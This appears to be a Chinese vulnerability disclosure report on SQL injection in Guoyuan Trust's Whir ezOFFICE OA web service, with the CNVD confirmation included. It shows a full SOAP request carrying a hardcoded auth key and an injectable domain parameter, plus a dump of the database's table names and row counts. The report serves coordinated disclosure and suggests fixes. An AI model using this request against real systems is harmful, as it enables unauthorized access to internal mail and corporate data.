2016-05-29: 细节已通知厂商并且等待厂商处理中
2016-05-31: 厂商已经确认,细节仅向厂商公开
2016-06-10: 细节向核心白帽子及相关领域专家公开
2016-06-20: 细节向普通白帽子公开
2016-06-30: 细节向实习白帽子公开
2016-07-15: 细节向公众公开
国元信托 OA:http://**.**.**.**:7001/defaultroot/login.jsp
注入点:下面请求中 * 号处(<domain> 参数)
POST http://**.**.**.**:7001/defaultroot/xfservices/GeneralWeb HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 463
Host: **.**.**.**:7001
Proxy-Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

<soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">
 <soapenv:Header/>
 <soapenv:Body>
 <gen:OAManager>
 <gen:input><root><key>auth.key.whir2012</key><cmd>syncUserList</cmd><domain>1*--</domain></root></gen:input>
 </gen:OAManager>
 </soapenv:Body>
</soapenv:Envelope>
Database: EZOFFICE+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| SECURITY_LOG | 648684 || OA_INFORMATIONSTATISTICS | 632866 || OA_INFORMATIONBROWSER | 434800 || WF_DEALWITHLOG | 32484 || WF_PROCEEDTRANSITION | 26185 || WF_PROCEEDACTIVITY | 25161 || OA_INFORMATION | 23817 || WF_PROCEEDTR | 22593 || WF_WORK | 20605 || OA_INFORMATIONACCESSORY | 15978 || WF_DEALWITHCOMMENT | 13968 || WF_DEALWITH | 12238 || DOCUMENT_SIGNATURE | 11367 || OA_ALLATTACH | 9610 || SYS_EXPORT_SCHEMA_08 | 8288 || SYS_EXPORT_SCHEMA_06 | 8267 || SYS_EXPORT_SCHEMA_05 | 8256 || SYS_EXPORT_SCHEMA_04 | 8244 || SYS_EXPORT_SCHEMA_03 | 8234 || SYS_EXPORT_SCHEMA_01 | 8217 || ORG_TMPPASSWORD | 7176 || OA_MAIL_USER | 6937 || EZ_FLOW_ACTION_LOG | 6929 || EZ_BPMPOOL_PROCINST | 4689 || EZ_FLOW_HI_ACTINST | 4385 || WF_PROCEEDFLOW | 4287 || DOCUMENT | 3882 || DOCUMENT_FILE | 3762 || OA_MAILINTERIOR | 3539 || OA_ANSWERSHEETOPTION | 3054 || EZ_FLOW_HI_TASKINST | 2956 || OA_DISTRICT | 2476 || SYS_EXPORT_SCHEMA_07 | 2371 || WHIR$CITY | 2232 || WF_READWRITECONTROL | 2203 || EZ_FLOW_RE_COMMENT | 2102 || OA_INFORMATIONHISTORY | 2079 || WHIR$T3011 | 1950 || OA_INFORPERSONALSTAT | 1876 || EXPORT000002 | 1772 || OA_ANSWERSHEETCONTENT | 1558 || OA_INFORORGSTAT | 992 || ORG_SYNCRTX | 941 || EZ_FLOW_RU_VARIABLE | 847 || ORG_RIGHTSCOPE | 839 || WHIR$T3013 | 800 || OA_THEMEOPTION | 780 || OA_INFORHISTORYACCESSORY | 761 || EZ_FLOW_HI_PROCINST | 742 || OA_MAILACCESSORY | 728 || WHIR$T3023 | 627 || TELT | 515 || EZ_FORM_FIELD | 510 || OA_VOITUREAPPLY | 510 || OA_PASSWORD_HISTORY | 503 || EZ_FLOW_GE_BYTEARRAY | 471 || TFIELD | 400 || GOV_RECEIVEFILE | 393 || OA_PATCHINFO | 377 || WF_IMMOBILITYFIELD | 370 || WF_TRANSITIONRESTRICTION | 367 || ZL_USER_INFO | 281 || ORG_RIGHT | 269 || WF_TRANSITION | 249 || WF_ACTIVITY | 245 || ORG_EMPLOYEE | 216 || ORG_ORGANIZATION_USER | 214 || WHIR$COUNTRY | 210 || EZ_SECU_ERRORCLIENT | 205 || ORG_ROLE_RIGHT | 200 || OA_SYSTEM_REMIND | 
188 || HR_RPT_INIT_FIELD | 183 || SECURITY_LOGOIN_ERROR | 182 || GOV_SENDDOCUMENTUPDATE | 179 || WHIR$T3010 | 155 || EZ_FLOW_DE_ACTIVITY | 144 || EZ_FLOW_RE_DEPLOYMENT | 135 || EZ_FLOW_RE_PROCDEF | 135 || EZ_SECU_PAGELIST | 124 || OA_INFORMATIONCHANNEL | 119 || OA_QUESTHEME | 119 || EMPLOYEE_20110217145223SCOPE | 118 || EMPLOYEE_20110217150839SCOPE | 118 || OA_ANSWERSHEET | 116 || HR_S_GZXM | 100 || GOV_CUSTOM_CHECKFIELD | 98 || BOOKMARKS | 94 || EZ_FLOW_RU_EXECUTION | 90 || GOV_CUSTOM_FIELD | 87 || WHIR$T3024 | 87 || OA_CUSTMENU | 81 || WHIR$T3015 | 80 || OA_PORTAL_PORTLET_SETTING | 76 || WHIR$T3025 | 75 || OA_PORTAL_PORTLET | 73 || OA_MENUSET | 68 || TSHOW | 67 || WF_GRAPH_UNIT | 59 || EZ_BPMPOOL_PROCESSPACKAGE | 56 || SECURITY_LOG_MODULE | 56 || WF_PACKAGE | 56 || ORG_USER_ROLE | 55 || EZ_BPMPOOL_PROCESS | 54 || GOV_DOCUMENTSENDFILE | 53 || OA_PERSONOA_USER_PRESS_RELATIO | 53 || OA_INFORMATIONCOMMENT | 51 || ORG_LOGINPAGESETTAB | 51 || TAREA | 50 || ORG_USER_GROUP | 46 || TPAGE | 46 || EZ_FORM_TABLE | 44 || WHIR$T3032 | 44 || EZ_FORM | 40 || OA_WORKLOG | 40 || WF_NEEDFLOWMODULE | 40 || OA_NETDISK_FILE | 39 || OA_OFFICALDICTION | 39 || WHIR$T3009 | 38 || EZ_BPMPOOL_PROCESS_STARTUSER | 37 || WF_IMMOBILITYFORM | 37 || WF_WORKFLOW_DESIGNER | 37 || TTABLE | 34 || WHIR$PROVINCE | 34 || OA_PORTAL_LAYOUT_PORTLET | 32 || EZ_FLOW_DE_DESIGFORM | 28 || EZ_FLOW_DE_DESIGNER | 28 || EZ_FLOW_RE_PACK_PDE | 28 || ORG_ORGANIZATION | 28 || TEMPLATE_BOOKMARKS | 28 || EZ_BPMPOOL_PROCESS_STARTORG | 27 || WF_DEALWITHCOMMENT_DRAFT | 27 || WF_WORKFLOWPROCESS | 27 || CUSTOMER_CENTER | 26 || OA_PERSONOA_PRESS | 26 || EZ_FLOW_RU_TASK | 25 || OA_INFORMATION_PRINT | 25 || EVO_WEIXIN_ORGMAP | 24 || OA_DUTY | 24 || OA_PORTAL_LAYOUT | 24 || WF_WORKFLOWWRITECONTROL | 24 || WF_OA_RELATEFIELD | 22 || OA_INFORMATION_DEPARTMENT_XML | 21 || EZ_FORM_PRINT | 20 || OA_EVENTATTENDER | 20 || SITE_RIGHT | 20 || WHIR$T3040 | 19 || OA_BOARDROOM_PERSONS | 17 || ORG_20110217150839 | 16 || ORG_ROLE | 16 || 
GOV_SENDDOCUMENTTOPICAL | 15 || WHIR$T3031 | 15 || MS_MODEL | 14 || OA_RELATIONMODULE | 14 || OA_PORTAL_TYPE | 13 || DOCUMENT_HISTORY | 12 || GOV_DOCUMENTUNIT | 12 || OA_PERSONAL_POSITIONS | 12 || TMODEL | 12 || EZ_BPMPOOL_RELATIONPROCESS | 11 || OA_EVENT | 11 || OA_GRAPHREPORT | 11 || OA_GRAPHREPORT_TYPE | 11 || OA_VOITURE | 11 || WHIR$T3026 | 11 || HR_S_INCOME_TAX | 9 || OA_BOARDROOM_EXECUTESTATUS | 9 || OA_EXT_TABLE | 9 || OA_MENU | 9 || OA_PORTAL_TEMPLATE | 9 || TAREATYPE | 9 || WF_OLDCOMMENTLOG | 9 || WHIR$T3028 | 9 || HR_S_RATIO_SETTING | 8 || OA_BDROOMAPPTYPE | 8 || OA_INFORMATIONSTATISTICSTYPE | 8 || ORG_GROUP | 8 || WF_RU_REMINDINFO | 8 || WHIR$T3020 | 8 || GOV_RECEIVEFILENUMSEQ | 7 || GOV_RECEIVEFILESEQ | 7 || OA_EMPLOYEE_STATUS | 7 || OA_EXT_SHOW | 7 || OA_PERSONONDUTY | 7 || OA_RELATIONOBJECT | 7 || OA_STATUS_DETAIL | 7 || TEMPLATE_FILE | 7 || WF_RELATIONPROCESS | 7 || WHIR$T3018 | 7 || GOV_SENDDOCUMENTNUM | 6 || GOV_SENDDOCUMENTWORD | 6 || OA_MATURITY_ALERT_SETTINGS | 6 || OA_QUESTIONNAIRE | 6 || ORG_EMPLOYEE_EDUSTORY | 6 || ORG_SIDELINE | 6 || EMPLOYEE_20110217145223ROLE | 5 || EMPLOYEE_20110217150839ROLE | 5 || EZ_FORM_MODULE | 5 || LDAPSET | 5 || OA_DEPARTMENTSTYLE | 5 || OA_INFORMATIONLUCENETEMP | 5 || OA_SYSDICT | 5 || SIGNATURE | 5 || SYS_CORP_SET_APP | 5 || SYS_EXPORT_SCHEMA_02 | 5 || WHIR$T3016 | 5 || WHIR$T3022 | 5 || WHIR$T3027 | 5 || EZ_BPMPOOL_COMMONPROCESS | 4 || HR_RPT_SHOW_FIELD | 4 || MS_INFOFLOW | 4 || OA_EXT_TYPE | 4 || OA_PORTAL_PORTLET_FILE | 4 || OA_TASK | 4 || OA_TASKEXEC | 4 || OA_TASKVIEW | 4 || TTYPE | 4 || EZ_FLOW_GE_PROPERTY | 3 || GJ_EMPCHANGETYPE | 3 || GOV_CUSTOM_DOCUMNET | 3 || OA_DOSSIER_GDSET | 3 || SECURITY_ONLINEUSER | 3 || UNION_TASKFROM | 3 || USER_ORG_SYN_ERRLOG | 3 || ZL_ORG_INFO | 3 || EMPLOYEE_20110217145223 | 2 || EMPLOYEE_20110217150839 | 2 || EZ_FLOW_RU_PROCDRAFT | 2 || HR_DEPT_KIND | 2 || HR_PERSON_TYPE | 2 || LDAPACCOUNTS | 2 || OA_BOARDROOM | 2 || OA_CARDEMPINFO | 2 || OA_CUSTOMDESKTOPLAYOUT | 2 || 
OA_FORUM | 2 || OA_FORUMCLASS | 2 || OA_NOTEPAPER | 2 || OA_PERSONALSTAT | 2 || OA_SYSTEM_USERMODULE | 2 || OA_TRAINCLASS | 2 || TLIMIT | 2 || TSEQ | 2 || VERSION_FILE | 2 || WEIBO_USER | 2 || WF_WORK_ACCESSORY | 2 || WHIR$T3030 | 2 || WHIR$T3041 | 2 || EMPLOYEE_20110217145223USER | 1 || EMPLOYEE_20110217150839USER | 1 || EZ_BPMPOOL_PROCESS_STARTGROUP | 1 || GJ_DRAWDEPT | 1 || GJ_GOODS | 1 || GJ_GOODSTYPE | 1 || GJ_PTDETAIL | 1 || GJ_PTMASTER | 1 || GJ_STOCK | 1 || GJ_STOCK_GOODSTYPE | 1 || GJ_SUPPLYUNIT | 1 || GOV_DOCUMENTFILETYPE | 1 || GOV_RECEIVEDOCUMENTBASEINFO | 1 || GOV_SENDDOCUMENTBASEINFO | 1 || GOV_SENDFILE_USER | 1 || HR_RPT_SOLUTION | 1 || HR_S_FFFS_SETTING | 1 || OA_BOARDROOM_MEETINGTIME | 1 || OA_BOARDROOMAPPLY | 1 || OA_BOOKS | 1 || OA_BOOKSTYPE | 1 || OA_DIARYCLASS | 1 || OA_INFORMATIONTAG | 1 || OA_LIBRARY | 1 || OA_MAIL_H_SET | 1 || OA_ORGWRAP | 1 || OA_PERSONSETUP | 1 || OA_PORTAL_MENU_SETTING | 1 || OA_RECORDTYPE | 1 || OA_SEQ | 1 || OA_SYS_MAILREMIND | 1 || OA_TASKHISTORY | 1 || OA_TASKREMIND | 1 || OA_TRAINRECORD | 1 || OA_UNITINFO | 1 || OA_VOITUREAUDITING | 1 || OA_VOITURETYPE | 1 || OA_WF_OVERDATE | 1 || OA_WF_WORKDATE | 1 || OA_WORKADDRESS_TYPE | 1 || OACONSOLE_MANAGER | 1 || ORG_20110217145223 | 1 || ORG_20110217145223USER | 1 || ORG_20110217150839USER | 1 || ORG_DOMAIN | 1 || ORG_GROUP_CLASS | 1 || ORG_MANAGER | 1 || ORG_ROLE_CLASS | 1 || SECURITY_DOG | 1 || SECURITY_IP | 1 || SITE_MANAGER | 1 || SYS_CORP_SET | 1 || WH_APPEND | 1 |+--------------------------------+---------+
登录后,可以看到内部邮件以及其他的集成系统,所以危害还是蛮大的。修复时应对 <domain> 等传入参数使用参数化查询,并限制 xfservices 接口仅对可信来源开放。
危害等级:高
漏洞Rank:10
确认时间:2016-05-31 17:45
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无